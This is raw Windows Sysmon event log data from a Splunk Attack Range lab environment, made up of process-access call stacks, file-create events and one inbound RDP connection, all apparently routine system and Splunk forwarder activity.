09:02:28.499{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976797Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.499{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976796Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.499{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976795Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.499{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976794Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.499{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976793Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.499{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976792Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.499{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-88A4-6151-8579-00000000FD01}2812C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976791Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.499{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88A4-6151-8579-00000000FD01}2812C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976790Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.484{69CF5F33-88A4-6151-8579-00000000FD01}2812C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976789Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.390{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5CD35369A43906C0DAE6DC3C6C589DCB,SHA256=03187E64D4E8F9787EDADFFFF7DD468CFF9951210BE9EE9F4E569B7ED9496AC0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976788Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.187{69CF5F33-88A3-6151-8479-00000000FD01}5122256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000976787Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:28.124{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF83AF99FF8D75EE305C8295844A0B29,SHA256=EF9625F4E5F345F611FC06366EEE6ABC54E848076DC543E36EB8D7E38CE1E925,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048173Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:27.469{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59628-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048172Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:28.136{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE16D3E926357C80C34372770E62CC86,SHA256=72385BD428B69FEE5AD0E4C2FE4094CF6AAE640A7BF0B5BC1C0AA73E6352F527,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048206Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048205Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048204Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048203Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048202Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048201Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048200Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048199Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048198Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048197Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048196Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048195Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048194Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048193Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048192Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048191Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048190Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:29.905{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048189Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 